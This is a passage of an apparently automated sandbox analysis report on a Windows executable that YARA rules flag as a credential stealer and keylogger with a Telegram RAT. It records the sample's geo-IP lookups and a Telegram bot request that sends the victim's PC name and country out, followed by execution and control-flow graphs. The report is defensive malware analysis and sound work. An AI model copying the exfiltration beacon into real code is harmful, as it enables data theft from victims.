                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 28276
                                                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yOpXHubcwSKPWNOY%2FVxCywn2nALRpDuAMgRaExmAViYEmuS%2BWgBZfNUIhwymDmc3LxWDbo4d8CgSaPsIw5RU5NK3%2F1fCdQ9XFVsDbB9MX83i7dXT1lWO2Iw3k2D9ktpEtSsvBCsm"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c942eb69c4e4375-EWR
                                                        2024-09-26 15:10:44 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                        2024-09-26 15:10:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.449751188.114.97.34437268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-26 15:10:45 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-09-26 15:10:45 UTC676INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:10:45 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 28277
                                                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2BZvFjdo%2Fb0n5tYkkUQF53i3XcrfLl250UYyhDRuqW6oN6y8M3KbYtdWPjvMd7RU3hLBgg6qHCbZyTsqEDcf4kZ95vir3P4yRhQbqRpz9ZqKTlnA66tCbRhTGkgYTEl81tnemHuB"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c942ebf3a3c41ed-EWR
                                                        2024-09-26 15:10:45 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                        2024-09-26 15:10:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.449752149.154.167.2204437268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-26 15:10:46 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2029/09/2024%20/%2005:52:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                        Host: api.telegram.org
                                                        Connection: Keep-Alive
                                                        2024-09-26 15:10:46 UTC344INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.18.0
                                                        Date: Thu, 26 Sep 2024 15:10:46 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 55
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        2024-09-26 15:10:46 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Target ID:0
                                                        Start time:11:09:57
                                                        Start date:26/09/2024
                                                        Path:C:\Users\user\Desktop\z64BLPL.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\z64BLPL.exe"
                                                        Imagebase:0x690000
                                                        File size:276'992 bytes
                                                        MD5 hash:9C7CF85D2FA1D9C0B6C591B94CBF2830
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:14.6%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:16.1%
                                                          Total number of Nodes:112
                                                          Total number of Limit Nodes:9
                                                          execution_graph 27294 bfbb18 27295 bfbb40 27294->27295 27298 bfbb6c 27294->27298 27296 bfbb49 27295->27296 27299 bfb04c 27295->27299 27300 bfb057 27299->27300 27302 bfbe63 27300->27302 27303 bfb068 27300->27303 27302->27298 27304 bfbe98 OleInitialize 27303->27304 27305 bfbefc 27304->27305 27305->27302 27394 bf4d68 27396 bf4d99 27394->27396 27397 bf4e99 27394->27397 27395 bf4da5 27396->27395 27400 bf62cf 27396->27400 27405 bf62e0 27396->27405 27402 bf630b 27400->27402 27401 bf63ba 27401->27401 27402->27401 27410 bf71b0 27402->27410 27414 bf71c0 27402->27414 27406 bf630b 27405->27406 27407 bf63ba 27406->27407 27408 bf71b0 CreateWindowExW 27406->27408 27409 bf71c0 CreateWindowExW 27406->27409 27408->27407 27409->27407 27411 bf71c0 27410->27411 27418 bf45ac 27411->27418 27415 bf71c6 27414->27415 27416 bf45ac CreateWindowExW 27415->27416 27417 bf71f5 27416->27417 27417->27401 27419 bf7210 CreateWindowExW 27418->27419 27421 bf7334 27419->27421 27306 cdd044 27307 cdd05c 27306->27307 27308 cdd0b6 27307->27308 27313 bf45d4 27307->27313 27322 bf73c8 27307->27322 27326 bf8519 27307->27326 27335 bf73b9 27307->27335 27314 bf45df 27313->27314 27315 bf8589 27314->27315 27317 bf8579 27314->27317 27355 bf46fc 27315->27355 27339 bf877c 27317->27339 27345 bf86a0 27317->27345 27350 bf86b0 27317->27350 27318 bf8587 27323 bf73ee 27322->27323 27324 bf45d4 CallWindowProcW 27323->27324 27325 bf740f 27324->27325 27325->27308 27329 bf8555 27326->27329 27327 bf8589 27328 bf46fc CallWindowProcW 27327->27328 27331 bf8587 27328->27331 27329->27327 27330 bf8579 27329->27330 27332 bf877c CallWindowProcW 27330->27332 27333 bf86b0 CallWindowProcW 27330->27333 27334 bf86a0 CallWindowProcW 27330->27334 27331->27331 27332->27331 27333->27331 27334->27331 27336 bf73ee 27335->27336 27337 bf45d4 CallWindowProcW 27336->27337 27338 bf740f 27337->27338 27338->27308 27340 bf873a 27339->27340 27341 bf878a 27339->27341 27359 bf8758 27340->27359 27362 bf8768 27340->27362 27342 bf8750 27342->27318 27346 bf86c4 27345->27346 27348 bf8768 CallWindowProcW 27346->27348 27349 bf8758 CallWindowProcW 27346->27349 27347 bf8750 27347->27318 27348->27347 27349->27347 27352 bf86c4 27350->27352 27351 bf8750 27351->27318 27353 bf8768 CallWindowProcW 27352->27353 27354 bf8758 CallWindowProcW 27352->27354 27353->27351 27354->27351 27356 bf4707 27355->27356 27357 bf99ea CallWindowProcW 27356->27357 27358 bf9999 27356->27358 27357->27358 27358->27318 27360 bf8779 27359->27360 27365 bf992f 27359->27365 27360->27342 27363 bf8779 27362->27363 27364 bf992f CallWindowProcW 27362->27364 27363->27342 27364->27363 27366 bf46fc CallWindowProcW 27365->27366 27367 bf993a 27366->27367 27367->27360 27422 6699df0 27423 6699e1d 27422->27423 27424 66994a8 LdrInitializeThunk 27423->27424 27425 669bcff 27423->27425 27426 669a126 27423->27426 27424->27426 27426->27425 27427 66994a8 LdrInitializeThunk 27426->27427 27427->27426 27368 d3e138 27369 d3e144 27368->27369 27372 6692970 27369->27372 27370 d3e1e3 27373 6692992 27372->27373 27374 6692a5e 27373->27374 27378 66994a8 27373->27378 27382 66996c8 27373->27382 27388 6699aac 27373->27388 27374->27370 27379 66994ba 27378->27379 27381 66994bf 27378->27381 27379->27374 27380 6699be9 LdrInitializeThunk 27380->27379 27381->27379 27381->27380 27384 66996f9 27382->27384 27383 6699859 27383->27374 27384->27383 27385 6699aa4 LdrInitializeThunk 27384->27385 27387 66994a8 LdrInitializeThunk 27384->27387 27385->27383 27387->27384 27389 6699963 27388->27389 27390 6699aa4 LdrInitializeThunk 27389->27390 27393 66994a8 LdrInitializeThunk 27389->27393 27392 6699c01 27390->27392 27392->27374 27393->27389 27428 bf5220 27429 bf5268 GetModuleHandleW 27428->27429 27430 bf5262 27428->27430 27431 bf5295 27429->27431 27430->27429

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 783 d3c146-d3c158 784 d3c184 783->784 785 d3c15a-d3c172 783->785 786 d3c186-d3c18a 784->786 789 d3c174-d3c179 785->789 790 d3c17b-d3c17e 785->790 789->786 791 d3c180-d3c182 790->791 792 d3c18b-d3c199 790->792 791->784 791->785 794 d3c1a3-d3c1a9 792->794 795 d3c19b-d3c1a1 792->795 796 d3c1ab-d3c1c8 794->796 795->794 795->796 797 d3c1ca 796->797 798 d3c1cf-d3c2ac call d341a0 call d33cc0 796->798 797->798 808 d3c2b3-d3c2d4 call d35658 798->808 809 d3c2ae 798->809 811 d3c2d9-d3c2e4 808->811 809->808 812 d3c2e6 811->812 813 d3c2eb-d3c2ef 811->813 812->813 814 d3c2f1-d3c2f2 813->814 815 d3c2f4-d3c2fb 813->815 818 d3c313-d3c357 814->818 816 d3c302-d3c310 815->816 817 d3c2fd 815->817 816->818 817->816 822 d3c3bd-d3c3d4 818->822 824 d3c3d6-d3c3fb 822->824 825 d3c359-d3c36f 822->825 832 d3c413 824->832 833 d3c3fd-d3c412 824->833 829 d3c371-d3c37d 825->829 830 d3c399 825->830 834 d3c387-d3c38d 829->834 835 d3c37f-d3c385 829->835 831 d3c39f-d3c3bc 830->831 831->822 833->832 836 d3c397 834->836 835->836 836->831
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                          • API String ID: 0-1487592376
                                                          • Opcode ID: 18427c7a7102b0e29377e54f3d55fe402c4ceb35e4a11a017d64498c028d5b32
                                                          • Instruction ID: 7e8ced54b661f7b7cf5507bfaf206d002e256605d569aff7a5dc12caba9dc833
                                                          • Opcode Fuzzy Hash: 18427c7a7102b0e29377e54f3d55fe402c4ceb35e4a11a017d64498c028d5b32
                                                          • Instruction Fuzzy Hash: E8A1C575E10218DFDB14DFAAD884A9DBBF2BF89310F14D069E409AB365DB31A941CF60

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 840 d35362-d35364 841 d35366-d353a0 840->841 842 d353c4-d35484 call d341a0 call d33cc0 840->842 843 d353a2 841->843 844 d353a7-d353c2 841->844 854 d35486 842->854 855 d3548b-d354a9 842->855 843->844 844->842 854->855 885 d354ac call d35649 855->885 886 d354ac call d35658 855->886 856 d354b2-d354bd 857 d354c4-d354c8 856->857 858 d354bf 856->858 859 d354ca-d354cb 857->859 860 d354cd-d354d4 857->860 858->857 861 d354ec-d35530 859->861 862 d354d6 860->862 863 d354db-d354e9 860->863 867 d35596-d355ad 861->867 862->863 863->861 869 d35532-d35548 867->869 870 d355af-d355d4 867->870 874 d35572 869->874 875 d3554a-d35556 869->875 876 d355d6-d355eb 870->876 877 d355ec 870->877 880 d35578-d35595 874->880 878 d35560-d35566 875->878 879 d35558-d3555e 875->879 876->877 881 d35570 878->881 879->881 880->867 881->880 885->856 886->856
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                          • API String ID: 0-1487592376
                                                          • Opcode ID: eccaa6937c6ad52a411e48855d6588b02e6d0fe10630bf31322ff6ded8bff7a7
                                                          • Instruction ID: 4e44ad08c64ec5fe02575ae2dc4d2421793c9f1a73caeec1bc7f83381508260d
                                                          • Opcode Fuzzy Hash: eccaa6937c6ad52a411e48855d6588b02e6d0fe10630bf31322ff6ded8bff7a7
                                                          • Instruction Fuzzy Hash: 7491D474E01618CFDB14DFAAD984A9DBBF2BF89300F14C069E409AB365DB349985CF60

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 887 d3cd28-d3cd58 888 d3cd5a 887->888 889 d3cd5f-d3ce3c call d341a0 call d33cc0 887->889 888->889 899 d3ce43-d3ce64 call d35658 889->899 900 d3ce3e 889->900 902 d3ce69-d3ce74 899->902 900->899 903 d3ce76 902->903 904 d3ce7b-d3ce7f 902->904 903->904 905 d3ce81-d3ce82 904->905 906 d3ce84-d3ce8b 904->906 907 d3cea3-d3cee7 905->907 908 d3ce92-d3cea0 906->908 909 d3ce8d 906->909 913 d3cf4d-d3cf64 907->913 908->907 909->908 915 d3cf66-d3cf8b 913->915 916 d3cee9-d3ceff 913->916 922 d3cfa3 915->922 923 d3cf8d-d3cfa2 915->923 920 d3cf01-d3cf0d 916->920 921 d3cf29 916->921 924 d3cf17-d3cf1d 920->924 925 d3cf0f-d3cf15 920->925 926 d3cf2f-d3cf4c 921->926 923->922 927 d3cf27 924->927 925->927 926->913 927->926
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                          • API String ID: 0-1487592376
                                                          • Opcode ID: fc7ccd19deefad01ce9d027f0ff6f11f7e7db31239b31f6fc300def9b633f943
                                                          • Instruction ID: 82b2389870016d1ab6f5f0296aa6201d321ffa1a8c8f94ffdbb8d893dad49729
                                                          • Opcode Fuzzy Hash: fc7ccd19deefad01ce9d027f0ff6f11f7e7db31239b31f6fc300def9b633f943
                                                          • Instruction Fuzzy Hash: 5B81A274E11218DFDB14DFAAD984A9DBBF2BF88300F14D069E419AB365DB349981CF60

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 931 d3cff7-d3d028 932 d3d02a 931->932 933 d3d02f-d3d10c call d341a0 call d33cc0 931->933 932->933 943 d3d113-d3d134 call d35658 933->943 944 d3d10e 933->944 946 d3d139-d3d144 943->946 944->943 947 d3d146 946->947 948 d3d14b-d3d14f 946->948 947->948 949 d3d151-d3d152 948->949 950 d3d154-d3d15b 948->950 951 d3d173-d3d1b7 949->951 952 d3d162-d3d170 950->952 953 d3d15d 950->953 957 d3d21d-d3d234 951->957 952->951 953->952 959 d3d236-d3d25b 957->959 960 d3d1b9-d3d1cf 957->960 966 d3d273 959->966 967 d3d25d-d3d272 959->967 964 d3d1d1-d3d1dd 960->964 965 d3d1f9 960->965 968 d3d1e7-d3d1ed 964->968 969 d3d1df-d3d1e5 964->969 970 d3d1ff-d3d21c 965->970 967->966 971 d3d1f7 968->971 969->971 970->957 971->970
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                          • API String ID: 0-1487592376
                                                          • Opcode ID: 94cdf78fee84e917352cb509439eb6fd186958eae924fde7587deffc84b57828
                                                          • Instruction ID: 4709d0bbc26e7e478b208d0cf20f4a4df47d9230f6d042b532f070bc27bb9173
                                                          • Opcode Fuzzy Hash: 94cdf78fee84e917352cb509439eb6fd186958eae924fde7587deffc84b57828
                                                          • Instruction Fuzzy Hash: D4818474E00258DFDB14DFAAD984A9DBBF2BF88300F14C069E419AB365DB349985CF64

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 975 d3c468-d3c498 976 d3c49a 975->976 977 d3c49f-d3c57c call d341a0 call d33cc0 975->977 976->977 987 d3c583-d3c5a4 call d35658 977->987 988 d3c57e 977->988 990 d3c5a9-d3c5b4 987->990 988->987 991 d3c5b6 990->991 992 d3c5bb-d3c5bf 990->992 991->992 993 d3c5c1-d3c5c2 992->993 994 d3c5c4-d3c5cb 992->994 995 d3c5e3-d3c627 993->995 996 d3c5d2-d3c5e0 994->996 997 d3c5cd 994->997 1001 d3c68d-d3c6a4 995->1001 996->995 997->996 1003 d3c6a6-d3c6cb 1001->1003 1004 d3c629-d3c63f 1001->1004 1010 d3c6e3 1003->1010 1011 d3c6cd-d3c6e2 1003->1011 1008 d3c641-d3c64d 1004->1008 1009 d3c669 1004->1009 1012 d3c657-d3c65d 1008->1012 1013 d3c64f-d3c655 1008->1013 1014 d3c66f-d3c68c 1009->1014 1011->1010 1015 d3c667 1012->1015 1013->1015 1014->1001 1015->1014
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                          • API String ID: 0-1487592376
                                                          • Opcode ID: a3a7a84cf24e26f177836fed320af593302a7ce96da0d125d7bfed66a0f676c7
                                                          • Instruction ID: d36adf49b97e874510946a870ca5a01982918a98c0c16e9e535525449bc1d5c4
                                                          • Opcode Fuzzy Hash: a3a7a84cf24e26f177836fed320af593302a7ce96da0d125d7bfed66a0f676c7
                                                          • Instruction Fuzzy Hash: E781B274E10258CFDB14DFAAD984A9DBBF2BF88300F24D069E419AB365DB349981CF50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1019 d3d599-d3d5c8 1020 d3d5ca 1019->1020 1021 d3d5cf-d3d6ac call d341a0 call d33cc0 1019->1021 1020->1021 1031 d3d6b3-d3d6d4 call d35658 1021->1031 1032 d3d6ae 1021->1032 1034 d3d6d9-d3d6e4 1031->1034 1032->1031 1035 d3d6e6 1034->1035 1036 d3d6eb-d3d6ef 1034->1036 1035->1036 1037 d3d6f1-d3d6f2 1036->1037 1038 d3d6f4-d3d6fb 1036->1038 1039 d3d713-d3d757 1037->1039 1040 d3d702-d3d710 1038->1040 1041 d3d6fd 1038->1041 1045 d3d7bd-d3d7d4 1039->1045 1040->1039 1041->1040 1047 d3d7d6-d3d7fb 1045->1047 1048 d3d759-d3d76f 1045->1048 1055 d3d813 1047->1055 1056 d3d7fd-d3d812 1047->1056 1052 d3d771-d3d77d 1048->1052 1053 d3d799 1048->1053 1057 d3d787-d3d78d 1052->1057 1058 d3d77f-d3d785 1052->1058 1054 d3d79f-d3d7bc 1053->1054 1054->1045 1056->1055 1059 d3d797 1057->1059 1058->1059 1059->1054
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                          • API String ID: 0-1487592376
                                                          • Opcode ID: d2e1cadf140471f5327d81058e8aaf3e0e7aa67bbfdc0976a14af73aeed65449
                                                          • Instruction ID: 9cb8d78e1aa22c9f154efc9bd4aa31acc02b1b8c6158ae36224663a0b05a8b22
                                                          • Opcode Fuzzy Hash: d2e1cadf140471f5327d81058e8aaf3e0e7aa67bbfdc0976a14af73aeed65449
                                                          • Instruction Fuzzy Hash: 55819374E01218CFDB14DFAAD984A9DBBF2BF88300F24D469E419AB365DB349945CF60

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1107 d3d2cb-d3d2f8 1108 d3d2fa 1107->1108 1109 d3d2ff-d3d3dc call d341a0 call d33cc0 1107->1109 1108->1109 1119 d3d3e3-d3d404 call d35658 1109->1119 1120 d3d3de 1109->1120 1122 d3d409-d3d414 1119->1122 1120->1119 1123 d3d416 1122->1123 1124 d3d41b-d3d41f 1122->1124 1123->1124 1125 d3d421-d3d422 1124->1125 1126 d3d424-d3d42b 1124->1126 1127 d3d443-d3d487 1125->1127 1128 d3d432-d3d440 1126->1128 1129 d3d42d 1126->1129 1133 d3d4ed-d3d504 1127->1133 1128->1127 1129->1128 1135 d3d506-d3d52b 1133->1135 1136 d3d489-d3d49f 1133->1136 1142 d3d543 1135->1142 1143 d3d52d-d3d542 1135->1143 1140 d3d4a1-d3d4ad 1136->1140 1141 d3d4c9 1136->1141 1144 d3d4b7-d3d4bd 1140->1144 1145 d3d4af-d3d4b5 1140->1145 1146 d3d4cf-d3d4ec 1141->1146 1143->1142 1147 d3d4c7 1144->1147 1145->1147 1146->1133 1147->1146
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                          • API String ID: 0-1487592376
                                                          • Opcode ID: 995a3689825a3a5d3bd4ead5cae383805a6b676173c5a47b3eaa390766a03a48
                                                          • Instruction ID: 9c8fb041c127aceb23831d531124b7a2857f18ff12ca0c58d278e92847d754bb
                                                          • Opcode Fuzzy Hash: 995a3689825a3a5d3bd4ead5cae383805a6b676173c5a47b3eaa390766a03a48
                                                          • Instruction Fuzzy Hash: 92819374E00218DFDB14DFAAE984A9DBBF2BF88300F14C069E419AB365DB349981CF50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1063 d3c738-d3c768 1064 d3c76a 1063->1064 1065 d3c76f-d3c7ce call d341a0 1063->1065 1064->1065 1069 d3c7d3-d3c84c call d33cc0 1065->1069 1075 d3c853-d3c884 call d35658 1069->1075 1076 d3c84e 1069->1076 1079 d3c886 1075->1079 1080 d3c88b-d3c88f 1075->1080 1076->1075 1079->1080 1081 d3c891-d3c892 1080->1081 1082 d3c894-d3c89b 1080->1082 1083 d3c8b3-d3c8f7 1081->1083 1084 d3c8a2-d3c8b0 1082->1084 1085 d3c89d 1082->1085 1089 d3c95d-d3c974 1083->1089 1084->1083 1085->1084 1091 d3c976-d3c99b 1089->1091 1092 d3c8f9-d3c90f 1089->1092 1098 d3c9b3 1091->1098 1099 d3c99d-d3c9b2 1091->1099 1096 d3c911-d3c91d 1092->1096 1097 d3c939 1092->1097 1100 d3c927-d3c92d 1096->1100 1101 d3c91f-d3c925 1096->1101 1102 d3c93f-d3c95c 1097->1102 1099->1098 1103 d3c937 1100->1103 1101->1103 1102->1089 1103->1102
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                          • API String ID: 0-1487592376
                                                          • Opcode ID: d5bcf4fb531a4a10262b6895a43329e18053594dd84c55b7ea2b14470845cc64
                                                          • Instruction ID: cd08e5884eb48b0d560d6a84d4c06702d87c14a7d1713341527d277614ea0872
                                                          • Opcode Fuzzy Hash: d5bcf4fb531a4a10262b6895a43329e18053594dd84c55b7ea2b14470845cc64
                                                          • Instruction Fuzzy Hash: 34819174E002189FDB14DFAAD984B9DBBF2BF88300F24D069E459AB365DB349941CF60

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
